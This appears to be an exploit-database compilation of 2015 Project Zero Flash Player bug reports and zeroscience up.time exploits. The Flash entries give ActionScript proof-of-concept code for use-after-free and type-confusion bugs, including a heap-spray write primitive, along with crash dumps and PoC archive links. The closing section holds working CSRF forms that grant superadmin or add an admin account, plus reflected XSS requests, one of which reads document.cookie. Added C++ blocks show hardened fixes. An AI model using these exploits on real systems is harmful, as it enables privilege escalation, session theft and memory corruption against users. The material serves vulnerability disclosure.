Source: https://code.google.com/p/google-security-research/issues/detail?id=400&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
The attached sample file, signal_sigsegv_7ffff637297a_8900_e3f87b25c25db8f9ec3c975f8c1211cc.swf, crashes, perhaps relating to XML handling.
The crash looks like this on Linux x64:
=> 0x00007f6931226f22: mov 0x8(%rcx),%eax
rcx 0x303030303030300 217020518514230016
The wider context shows that the wild pointer target can be incremented with this vulnerability, which is typically enough for an exploit:
=> 0x00007f6931226f22: mov 0x8(%rcx),%eax <--- read
0x00007f6931226f25: test %eax,%eax
0x00007f6931226f27: je 0x7f6931226f80
0x00007f6931226f29: test $0x40000000,%eax
0x00007f6931226f2e: jne 0x7f6931226f80
0x00007f6931226f30: add $0x1,%eax <--- increment
0x00007f6931226f33: cmp $0xff,%al
0x00007f6931226f35: mov %eax,0x8(%rcx) <--- write back
The base sample from which this fuzz case was generated is also attached, e3f87b25c25db8f9ec3c975f8c1211cc.swf
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37870.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=404&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
Source file and compiled PoC attached.
Looking at https://github.com/adobe-flash/avmplus/blob/master/core/XMLListObject.cpp:
bool XMLListObject::delUintProperty(uint32_t index)
...
    if (index >= _length())                              // [1]
    {
        return true;
    }
...
    px->childChanges(core->knodeRemoved, r->atom());     // [2]
...
    m_children.removeAt(index);                          // [3]
In [1], the passed in index is validated. In [2], the callback can run actionscript, which might shrink the size of the current XMLList. In [3], the pre-validated index is used but it might now be invalid due to shrinking at [2]. Unfortunately, removeAt() does not behave well in the presence of an out-of-bounds index.
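The same check-then-act hazard as an added C++ example (not avmplus code): a list whose change notification can re-enter script and shrink it, with the deletion re-validating its index after the callback. All type and function names here are hypothetical.

```cpp
// Added example (not avmplus code): models the check-then-act hazard from
// delUintProperty(). The index validated at [1] is reused at [3] after a
// notification at [2] that can re-enter script and shrink the list, so the
// hardened version validates again after the callback. All type and
// function names here are hypothetical.
#include <cstddef>
#include <cstdint>
#include <functional>
#include <stdexcept>
#include <utility>
#include <vector>

class XmlListModel {
public:
    // Stands in for childChanges(): in Flash this can run ActionScript,
    // which may mutate the very list being edited.
    using ChangeListener = std::function<void(XmlListModel&, uint32_t)>;

    explicit XmlListModel(std::vector<int> children)
        : m_children(std::move(children)) {}

    uint32_t length() const { return static_cast<uint32_t>(m_children.size()); }
    void setListener(ChangeListener l) { m_listener = std::move(l); }

    // Hardened delUintProperty: validate, notify, then validate AGAIN before
    // touching storage, because the notification may have shrunk the list.
    bool delUintProperty(uint32_t index) {
        if (index >= length()) return true;           // [1] original check
        if (m_listener) m_listener(*this, index);     // [2] may re-enter and shrink
        if (index >= length()) {                      // re-check: index may be stale
            ++m_staleIndexRejected;
            return true;                              // nothing left to remove
        }
        removeAt(index);                              // [3] provably in bounds now
        return true;
    }

    // Removal primitive, also used by the listener to shrink the list during
    // [2]. Unlike the removeAt() the report describes, this one refuses an
    // out-of-bounds index instead of corrupting memory.
    void removeAt(uint32_t index) {
        if (index >= length()) throw std::out_of_range("removeAt: index out of bounds");
        m_children.erase(m_children.begin() + static_cast<std::ptrdiff_t>(index));
    }

    uint32_t staleIndexRejected() const { return m_staleIndexRejected; }

private:
    std::vector<int> m_children;
    ChangeListener m_listener;
    uint32_t m_staleIndexRejected = 0;
};

struct ScenarioResult {
    uint32_t finalLength;
    uint32_t staleRejections;
    bool threw;
};

// Scenario from the report: delete index 4 of a 5-element list while the
// listener (standing in for script run from childChanges()) shrinks the
// list to 2 elements. With the re-check, the now-stale index is rejected
// instead of reaching removeAt().
ScenarioResult runShrinkingListenerScenario() {
    XmlListModel list(std::vector<int>{10, 20, 30, 40, 50});
    list.setListener([](XmlListModel& self, uint32_t) {
        while (self.length() > 2) self.removeAt(0);
    });
    ScenarioResult r{0, 0, false};
    try {
        list.delUintProperty(4);                      // valid at [1], stale by [3]
    } catch (const std::out_of_range&) {
        r.threw = true;
    }
    r.finalLength = list.length();
    r.staleRejections = list.staleIndexRejected();
    return r;
}

// Control: no re-entrant listener, so the validated index stays valid and
// the last element is removed normally.
ScenarioResult runPlainDeleteScenario() {
    XmlListModel list(std::vector<int>{10, 20, 30, 40, 50});
    list.delUintProperty(4);
    return ScenarioResult{list.length(), list.staleIndexRejected(), false};
}
```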
The PoC works by triggering a wild copy in order to demonstrate the crash. But other side-effects are possible such as decrementing the refcount of an out-of-bounds index.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37872.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=408&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There is a use-after-free in CreateTextField. If a flash file contains a MovieClip hierarchy, such as:
_root-->l1-->l2-->l3
If createTextField is called on l2 to create l3, and the call makes a call into a function that deletes l2 or l1, a use-after-free occurs. A POC is as follows:
var l1 = this.createEmptyMovieClip("l1", 1);
var l2 = l1.createEmptyMovieClip("l2", 1);
ns = {toString: strfunc, valueOf: strfunc};
var l3 = l2.createTextField(ns, 1, 0, 0, 10, 10);
function strfunc(){
    l2.removeMovieClip();
    return "myname";
}
A sample SWF and fla are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37873.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=409&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There is a type confusion issue in TextRenderer.setAdvancedAntialiasingTable. If the font, insideCutoff or outsideCutoff are set to objects that are not integers, they are still assumed to be integers. A proof-of-concept is below:
var antiAliasEntry_1 = {fontSize:10, insideCutoff:1.61, outsideCutoff:-3.43};
var antiAliasEntry_2 = {fontSize:"", insideCutoff:0.8, outsideCutoff:-0.8};
var arialTable:Array = new Array(antiAliasEntry_1, antiAliasEntry_2);
TextRenderer.setAdvancedAntialiasingTable("Arial", "none", "dark", arialTable);
This issue is low-impact because the type-confused objects are read into the font and cutoff values, which cannot be directly retrieved from script. It is probably possible to determine the value read by doing hit tests on the text that is rendered (to see how big and clipped it is), but this would be fairly difficult.
A sample SWF and fla are attached; these samples intentionally crash to demonstrate the issue.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37874.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=416&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
This issue is a variant of issue 192 that the fix for that issue did not address.
If XMLSocket connect is called on an object that already has a destroy function set, such as a BitmapData object, the method will set the user data of that object, but not clear the destroy function. This leads to type confusion when the user data is freed during garbage collection.
A PoC is as follows:
class subsocket extends flash.display.BitmapData{
    public function subsocket(){
        var n = {valueOf : func};
        this.valueOf = func;
        var x = new XMLSocket();
        x.connect.call(this, "127.0.0.1", this);
    }
    function func(){
        if(this){
        }
        this.__proto__ = {};
        this.__proto__.__constructor__ = flash.display.BitmapData;
        super(10, 10, true, 10);
        return 80;
    }
}
A SWF and fla are attached. Note that this PoC needs to be run on a webserver on localhost (or change the IP in the PoC to the server value), and it only crashes in Chrome on 64-bit Linux.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37876.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=410&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
The following crash was observed in Flash Player 17.0.0.188 on Windows:
(81c.854): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=37397006 ebx=00000000 ecx=008c0493 edx=09f390d0 esi=08c24d98 edi=09dc2000
eip=07a218cb esp=015eda80 ebp=015edb24 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050216
Flash32_17_0_0_188+0x18cb:
07a218cb ff6004 jmp dword ptr [eax+0x4] ds:0023:3739700a=????????
- The test case reproduces on Windows 7 using IE11. It does not appear to immediately reproduce on Windows+Chrome or Linux+Chrome.
- The crash can also reproduce on one of the two mov instructions prior to the jmp shown here.
- The crash appears to occur due to a use-after-free related to loading a sub-resource from a URL.
- The test case minimizes to an 11-bit difference from the original sample file.
- The following test cases are attached: 2038518113_crash.swf (crashing file), 2038518113_min.swf (minimized file), 2038518113_orig.swf (original non-crashing file).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37875.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=418&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There is a use-after-free in the TextField gridFitType setter. A PoC is below:
var test = this.createTextField("test", 1, 0, 0, 100, 100);
var n = {toString : func, valueOf : func};
test.gridFitType = n;
function func(){
    test.removeTextField();
    for(var i = 0; i < 1000; i++){
        var b = new flash.display.BitmapData(1000, 1000, true, 10);
    }
    trace("here");
    return "natalie";
}
A PoC and fla are attached. Some other setters (thickness, tabIndex, etc.) are also impacted by the same UaF condition; additional SWFs are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37877.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=422&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There is a type confusion issue in the TextFormat constructor that is reachable because the FileReference constructor does not verify that the incoming object is of type Object (it only checks that the object is not native backed). The TextFormat constructor first sets a new object to type TextFormat, and then calls into script several times before setting the native backing object. If one of these script calls then calls into the FileReference constructor, the object can be set to type FileReference, and then the native object will be set to the TextFormat, leading to type confusion. A PoC is as follows:
In the main SWF:
var a = new subfr();
var allTypes:Array = new Array();
var imageTypes:Object = new Object();
imageTypes.description = "Images (*.jpg, *.jpeg, *.gif, *.png)";
imageTypes.extension = "*.jpg; *.jpeg; *.gif; *.png";
allTypes.push(imageTypes);
var textTypes:Object = new Object();
textTypes.description = "Text Files (*.txt, *.rtf)";
textTypes.extension = "*.txt;*.rtf";
allTypes.push(textTypes);
var f = new flash.net.FileReference();
f.cancel.call(a);
Defining subfr:
class subfr extends Object{
    public function subfr(){
        var n = {valueOf : func};
        this.valueOf = func;
        this.toString = func;
        this.__proto__ = {};
        this.__proto__.__constructor__ = TextFormat;
        super(this);
    }
    function func(){
        this.__proto__ = {};
        this.__proto__.__constructor__ = flash.net.FileReference;
        super();
        return "natalie";
    }
}
A sample SWF and fla are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37878.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=425&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
To reproduce, host the attached files appropriately and:
http://localhost/LoadMP4.swf?file=crash4000368.flv
If there is no crash at first, refresh the page a few times.
With a debugger attached to 64-bit Flash in Chrome Linux, the crash manifests like this:
=> 0x00007f7789d081bb <__memmove_ssse3_back+443>: movaps %xmm1,-0x10(%rdi)
rdi 0x7f7778d69200
7f777894b000-7f7778d69000 rw-p 00000000 00:00 0
7f7778d69000-7f7778d88000 ---p 00000000 00:00 0
This looks very much like a heap-based buffer overflow that just happens to have walked off the end of the committed heap.
Also, this bug bears disturbing similarities to CVE-2015-3043, see for example: https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37879.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=434&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
The Shared Object constructor does not check that the object it is provided is of type Object before setting it to be of type SharedObject. This can cause problems if another method (such as Sound.loadSound) calls into script between checking the input object type, and casting its native object. A PoC is as follows:
class subso extends Sound{
    public function subso(f){
        super("_level0.test");
        var n = {valueOf : func};
        _global.func = f;
        _global.t = this;
        var f2 = this.loadSound;
        f2.call(this, n, 1);
    }
    function func(){
        _global.func(_global.t,"/sosuper.swf", "/sosuper.swf");
        return 1;
    }
}
A sample fla, swf and AS file are attached. Note that this PoC needs to be hosted on a webserver to work and only works on 32-bit systems (tested on Windows Chrome). song1.mp3 should be put in the same folder on the server as the swf; it is needed for loadSound to work. This bug is likely only exploitable on 32-bit systems due to how the type-confused fields line up.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37881.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=426&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
To reproduce, host the attached files appropriately, and:
http://localhost/LoadMP4.swf?file=crash3006694.flv
If there is no crash at first, refresh the page a few times.
With a debugger attached to 64-bit Flash in Chrome Linux, the crash manifests like this:
=> 0x00007f7779846eee: mov %ax,(%rdi,%rdx,2)
rax 0xff69
rdi 0x7f7778b70000
rdx 0x160b
7f777861e000-7f7778b72000 rw-p 00000000 00:00 0
7f7778b72000-7f7779228000 ---p 00000000 00:00 0
It looks like an indexing error: the rdi "base" address is in bounds, but once 2*rdx is added the resulting address is not.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37880.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=443&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
If an mp3 file contains compressed ID3 data that is larger than 0x2aaaaaaa bytes, an integer overflow will occur in allocating the buffer to contain its converted string data, leading to a large copy into a small buffer. A sample fla, swf and mp3 are attached. Put id34.swf and tag.mp3 in the same folder to reproduce the issue. This issue only works on 64-bit platforms.
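The sizing arithmetic behind that threshold, as an added C++ example that is not Flash Player code: it assumes the converted buffer is sized as data length times 3 in a 32-bit integer (an assumption, chosen because it makes 0x2aaaaaaa the last length whose product fits a positive int32), and shows the checked computation that rejects anything larger.

```cpp
// Added example, not Flash Player code. Models the allocation arithmetic the
// report describes for converted ID3 text. ASSUMPTION (not from the report):
// the converted buffer is sized as data length * 3 in a 32-bit integer; that
// factor is what makes 0x2aaaaaaa the last safe length, since
// 3 * 0x2aaaaaab = 0x80000001 no longer fits a positive int32.
#include <cstdint>
#include <limits>

constexpr uint32_t kExpansionFactor = 3;   // assumed worst-case output bytes per input byte
constexpr uint32_t kInt32Max =
    static_cast<uint32_t>(std::numeric_limits<int32_t>::max());

// Flawed sizing: multiply first, check nothing. The wrapped/sign-flipped
// result is what gets allocated, while the copy that follows still uses the
// real ID3 length.
uint32_t naiveConvertedSize(uint32_t id3Len) {
    return id3Len * kExpansionFactor;              // modulo 2^32
}

// True when the naive product has the sign bit set, i.e. would read as a
// negative length if stored in a signed 32-bit int.
bool naiveSizeIsNegativeAsInt32(uint32_t id3Len) {
    return naiveConvertedSize(id3Len) > kInt32Max;
}

// Hardened sizing: bound the input before multiplying. Returns false (and
// leaves *outSize untouched) when the converted buffer cannot be represented,
// so the caller rejects the tag rather than allocating a too-small buffer.
bool checkedConvertedSize(uint32_t id3Len, uint32_t* outSize) {
    if (id3Len > kInt32Max / kExpansionFactor) return false;   // i.e. > 0x2aaaaaaa
    *outSize = id3Len * kExpansionFactor;
    return true;
}

// ID3v2.3 frame sizes are plain 4-byte big-endian integers; read one.
uint32_t readBigEndian32(const uint8_t b[4]) {
    return (static_cast<uint32_t>(b[0]) << 24) | (static_cast<uint32_t>(b[1]) << 16)
         | (static_cast<uint32_t>(b[2]) << 8)  |  static_cast<uint32_t>(b[3]);
}

// Planned allocation for a frame with the given size field, or 0 if rejected.
uint32_t plannedSizeOrZero(const uint8_t sizeField[4]) {
    uint32_t size = 0;
    return checkedConvertedSize(readBigEndian32(sizeField), &size) ? size : 0;
}

// Constructed sample size fields: the largest length the report says does not
// overflow, and the first one past it.
const uint8_t kLastSafeSize[4]    = {0x2a, 0xaa, 0xaa, 0xaa};
const uint8_t kFirstUnsafeSize[4] = {0x2a, 0xaa, 0xaa, 0xab};
```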
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37882.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=444&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Tracking for https://code.google.com/p/chromium/issues/detail?id=498984]
Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
---
VULNERABILITY DETAILS
There is a use after free vulnerability in the ActionScript 2 TextField.filters array property.
This is Issue 457278 resurrected. Again.
VERSION
Chrome Version: [43.0.2357.124, Flash 18.0.0.160]
Operating System: [Windows 7 x64 SP1]
REPRODUCTION CASE
There is a use after free vulnerability in the ActionScript 2 TextField.filters array property.
This is Issue 457278 resurrected. Again.
When the TextField.filters array is set, Flash creates an internal array holding the filters. When the property is read, Flash iterates over this array and clones each filter. During this loop, it is possible to execute some AS2 by overriding a filter's constructor. At that moment, if the AS2 code alters the filters array, Flash frees the internal array leaving a reference to freed memory in the stack. When the execution flow resumes to the loop, a use-after-free occurs.
Flash 17.0.0.169 added a flag to mitigate Issue 457278:
.text:004D6F0B mov esi, [esp+2Ch+var_C]
.text:004D6F0F push 1 ; char
.text:004D6F11 mov ecx, edi ; int
.text:004D6F13 mov byte ptr [esi+0Ch], 1 ; this flag was added
.text:004D6F17 call xparseAS2Code
.text:004D6F1C mov byte ptr [esi+0Ch], 0
Flash 18.0.0.160 added another flag to mitigate Issue 476926:
.text:004D6E3E loc_4D6E3E:
.text:004D6E3E cmp byte ptr [ebp+0Ch], 0 ; this flag was added
.text:004D6E42 lea eax, [ebp+0Ch]
.text:004D6E45 mov [esp+2Ch+var_8], eax
.text:004D6E49 jz short loc_4D6E58
.text:004D6E4B mov ecx, dword_E50A40
.text:004D6E51 call sub_967730
.text:004D6E58
.text:004D6E58 loc_4D6E58:
.text:004D6E58 mov byte ptr [eax], 1
.text:004D6E5B jmp short loc_4D6E65
But they didn't figure out that it was possible to execute AS2 code a bit above in the function:
.text:004D6E6F mov eax, [ebp+0]
.text:004D6E72 push 0
.text:004D6E74 lea edx, [esp+34h+var_14]
.text:004D6E78 push edx
.text:004D6E79 mov edx, [eax+14h]
.text:004D6E7C mov ecx, ebp
.text:004D6E7E call edx ; return the filter name
.text:004D6E80 push eax
.text:004D6E81 lea eax, [esp+3Ch+var_10]
.text:004D6E85 push eax
.text:004D6E86 mov ecx, edi
.text:004D6E88 call xcreateStringObject
.text:004D6E8D mov ebx, [esp+38h+arg_4]
.text:004D6E91 push eax
.text:004D6E92 push ecx
.text:004D6E93 mov eax, esp
.text:004D6E95 mov ecx, edi
.text:004D6E97 mov [eax], ebx
.text:004D6E99 call sub_420400 ; execute some AS2 with a custom __proto__ object
For example:
var oob = {}
oob.__proto__ = {}
oob.__proto__.addProperty("GlowFilter", function () {f(); return 0x123}, function () {});
flash.filters = oob
Tested on Flash Player standalone 18.0.0.160, and Chrome 43.0.2357.124.
That should crash while dereferencing 0x41424344.
Compile with Flash CS 5.5.
***************************************************************************
Content of FiltusPafusTer.fla
import flash.filters.GlowFilter;
var a1:Array = new Array()
var a2:Array = new Array()
for (i = 0; i<0x50/4;i++) {
    a2[i] = 0x41424344
}
for (var i = 0; i<0x200;i++) {
    var tf:TextFormat = new TextFormat()
    a1[i] = tf
}
for (var i = 0; i<0x200;i++) {
    a1[i].tabStops = a2
}
var tfield:TextField = createTextField("tf",1,1,2,3,4)
var glowfilter:GlowFilter = new GlowFilter(1,2,3,4,5,6,true,true)
tfield.filters = [glowfilter]
function f() {
    for (var i = 0; i<0x20;i++) {
        _global.a1[0x100+i*4].tabStops = [1,2,3,4]
    }
    _global.tfield.filters = []
    for (var i = 0; i<0x200;i++) {
        _global.a1[i].tabStops = a2
    }
}
_global.tfield = tfield
_global.a1 = a1
_global.a2 = a2
var oob = {}
oob.__proto__ = {}
oob.__proto__.addProperty("GlowFilter", function () {f(); return 0x123}, function () {});
flash.filters = oob
var a = tfield.filters
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37883.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=484&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Tracking for: https://code.google.com/p/chromium/issues/detail?id=508072]
VULNERABILITY DETAILS
Copy Paste of Issue 480496
VERSION
Chrome Version: N/A yet, Flash 18.0.0.203
Operating System: [Win7 x64 SP1]
REPRODUCTION CASE
Flash 18.0.0.203 patched Issue 480496 by checking if the internal filter object is still alive after the first Array.length call (from Flash player standalone):
.text:004D71DA loc_4D71DA:
.text:004D71DA and ecx, 0FFFFFFF8h
.text:004D71DD call xAS2_getArrayLength
.text:004D71E2 test eax, eax
.text:004D71E4 jle short loc_4D725D
.text:004D71E6 mov ecx, [esp+8+arg_C]
.text:004D71EA mov eax, [ecx+94h]
.text:004D71F0 test eax, 0FFFFFFFEh
.text:004D71F5 jz short loc_4D7200
.text:004D71F7 and eax, 0FFFFFFFEh
.text:004D71FA cmp dword ptr [eax+28h], 0 ; here we check whether the object has been deleted or not
.text:004D71FE jnz short loc_4D720B
.text:004D7200
.text:004D7200 loc_4D7200:
.text:004D7200 mov ecx, dword_E51A40
.text:004D7206 call sub_968A00 ; and in that case we suicide
Unfortunately they forgot to do that check after the second Array.length call:
.text:004D721D loc_4D721D:
.text:004D721D and eax, 0FFFFFFF8h
.text:004D7220 push edi
.text:004D7221 mov edi, eax
.text:004D7223 mov ecx, edi
.text:004D7225 xor esi, esi
.text:004D7227 call xAS2_getArrayLength ; here we can still execute a script and delete the filters...
.text:004D722C test eax, eax
.text:004D722E jle short loc_4D725C
Should crash that way:
CPU Disasm
Address Hex dump Command Comments
004CE27F 8B51 04 MOV EDX,DWORD PTR DS:[ECX+4]
004CE282 8942 04 MOV DWORD PTR DS:[EDX+4],EAX ; write a pointer to 0x41424344
004CE285 8B51 04 MOV EDX,DWORD PTR DS:[ECX+4]
004CE288 8950 08 MOV DWORD PTR DS:[EAX+8],EDX
004CE28B FF41 08 INC DWORD PTR DS:[ECX+8]
004CE28E 8941 04 MOV DWORD PTR DS:[ECX+4],EAX
004CE291 C2 0400 RETN 4
004CE294 FF41 08 INC DWORD PTR DS:[ECX+8]
***************************************************************************
Content of flash_as2_filters_uaf_write4_poc.fla
//Compile that with Flash CS5.5 and change the property "s" in the swf to "4"
//It's because Flash CS5.5 does not allow naming a property with a numeral
import flash.filters.GlowFilter;
var tfield:TextField = createTextField("tf",1,1,2,3,4)
var a1:Array = new Array()
var a2:Array = new Array()
for (i = 0; i<0x3F8/4;i++) {
    a2[i] = 0x41424344
}
a2[3] = 0
a2[0x324/4] = 0x41424344
a2[0x324/4 + 1] = 0x41424344
a2[0x324/4 + 2] = 0x41414143
a2[0x324/4 + 3] = 0x41414100
for (var i = 0; i<0x200;i++) {
    var tf:TextFormat = new TextFormat()
    a1[i] = tf
}
for (var i = 0; i<0x100;i++) {
    a1[i].tabStops = a2
}
a1[0xFF].tabStops = []
function f() {
    _global.mc.createTextField("tf",1,1,2,3,4)
    a1[0xFE].tabStops = []
    a1[0xFD].tabStops = []
    for (var i = 0x100; i<0x200;i++) {
        _global.a1[i].tabStops = _global.a2
    }
}
_global.mc = this
_global.counter = 0
_global.a1 = a1
_global.a2 = a2
var oCounter:Object = new Object()
oCounter.valueOf = function () {
    _global.counter += 1
    if (_global.counter == 4) f()
    return 10;
}
var o = {length:oCounter, s:new GlowFilter(1,2,3,4,5,6,true,true)}
tfield.filters = o;
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37884.zip
<!--
up.time 7.5.0 Superadmin Privilege Escalation Exploit
Vendor: Idera Inc.
Product web page: http://www.uptimesoftware.com
Affected version: 7.5.0 (build 16) and 7.4.0 (build 13)
Summary: The next-generation of IT monitoring software.
Desc: up.time suffers from a privilege escalation issue.
A normal user can elevate his/her privileges by sending
a POST request setting the parameter 'userroleid' to 1.
An attacker can also exploit this issue using cross-site
request forgery attacks.
Tested on: Jetty, PHP/5.4.34, MySQL
Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5251
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5251.php
29.07.2015
--
-->
<html>
<body>
<form action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=edit&id=4" method="POST">
<input type="hidden" name="operation" value="submit" />
<input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" />
<input type="hidden" name="username" value="Testingus2" />
<input type="hidden" name="password" value="*****" />
<input type="hidden" name="passwordConfirm" value="*****" />
<input type="hidden" name="firstname" value="Test" />
<input type="hidden" name="lastname" value="Ingus" />
<input type="hidden" name="location" value="Neverland" />
<input type="hidden" name="emailaddress" value="test2@test.test" />
<input type="hidden" name="emailtimeperiodid" value="1" />
<input type="hidden" name="phonenumber" value="111111" />
<input type="hidden" name="phonenumbertimeperiodid" value="1" />
<input type="hidden" name="windowshost" value="test" />
<input type="hidden" name="windowsworkgroup" value="testgroup" />
<input type="hidden" name="windowspopuptimeperiodid" value="1" />
<input type="hidden" name="landingpage" value="MyPortal" />
<input type="hidden" name="isonvacation" value="0" />
<input type="hidden" name="receivealerts" value="on" />
<input type="hidden" name="receivealerts" value="1" />
<input type="hidden" name="alertoncritical" value="on" />
<input type="hidden" name="alertoncritical" value="1" />
<input type="hidden" name="alertonwarning" value="on" />
<input type="hidden" name="alertonwarning" value="1" />
<input type="hidden" name="alertonunknown" value="on" />
<input type="hidden" name="alertonunknown" value="1" />
<input type="hidden" name="alertonrecovery" value="on" />
<input type="hidden" name="alertonrecovery" value="1" />
<input type="hidden" name="activexgraphs" value="0" />
<input type="hidden" name="newuser" value="on" />
<input type="hidden" name="newuser" value="1" />
<input type="hidden" name="userroleid" value="1" />
<input type="hidden" name="usergroupid[]" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
up.time 7.5.0 XSS And CSRF Add Admin Exploit
Vendor: Idera Inc.
Product web page: http://www.uptimesoftware.com
Affected version: 7.5.0 (build 16) and 7.4.0 (build 13)
Summary: The next-generation of IT monitoring software.
Desc: The application allows users to perform certain
actions via HTTP requests without performing any validity
checks to verify the requests. This can be exploited to
perform certain actions with administrative privileges
if a logged-in user visits a malicious web site. Multiple
cross-site scripting vulnerabilities were also discovered.
The issue is triggered when input passed via multiple
parameters is not properly sanitized before being returned
to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in context of
an affected site.
Tested on: Jetty, PHP/5.4.34, MySQL
Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5252
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5252.php
29.07.2015
--
CSRF Add Admin:
---------------
<html>
<body>
<form action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=add&id=0" method="POST">
<input type="hidden" name="operation" value="submit" />
<input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" />
<input type="hidden" name="username" value="Testingus4" />
<input type="hidden" name="password" value="123123" />
<input type="hidden" name="passwordConfirm" value="123123" />
<input type="hidden" name="firstname" value="Test" />
<input type="hidden" name="lastname" value="Ingus" />
<input type="hidden" name="location" value="Neverland" />
<input type="hidden" name="emailaddress" value="test4@test.test" />
<input type="hidden" name="emailtimeperiodid" value="1" />
<input type="hidden" name="phonenumber" value="111111" />
<input type="hidden" name="phonenumbertimeperiodid" value="1" />
<input type="hidden" name="windowshost" value="test" />
<input type="hidden" name="windowsworkgroup" value="testgroup" />
<input type="hidden" name="windowspopuptimeperiodid" value="1" />
<input type="hidden" name="landingpage" value="MyPortal" />
<input type="hidden" name="isonvacation" value="0" />
<input type="hidden" name="receivealerts" value="on" />
<input type="hidden" name="receivealerts" value="1" />
<input type="hidden" name="alertoncritical" value="on" />
<input type="hidden" name="alertoncritical" value="1" />
<input type="hidden" name="alertonwarning" value="on" />
<input type="hidden" name="alertonwarning" value="1" />
<input type="hidden" name="alertonunknown" value="on" />
<input type="hidden" name="alertonunknown" value="1" />
<input type="hidden" name="alertonrecovery" value="on" />
<input type="hidden" name="alertonrecovery" value="1" />
<input type="hidden" name="activexgraphs" value="0" />
<input type="hidden" name="newuser" value="on" />
<input type="hidden" name="newuser" value="1" />
<input type="hidden" name="userroleid" value="2" />
<input type="hidden" name="usergroupid[]" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Reflected XSS:
--------------
GET /main.php?section=UserContainer&subsection=edit&id=bc6ac%22%3E%3Cimg%20src%3da%20onerror%3dalert%28document.cookie%29;%3E&name=Testingus4 HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1a416c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea233bd169b0 HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6&entitymembership%5B%5D=14f2e6%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e46cfd43d432&entitygroupmembership%5B%5D=1 HTTP/1.1
-
GET /main.php?section=UserContainer&subsection=edit&id=bc6ac"><img%20src%3da%20onload%3dalert(1)>f2c23&name=Testingus4 HTTP/1.1
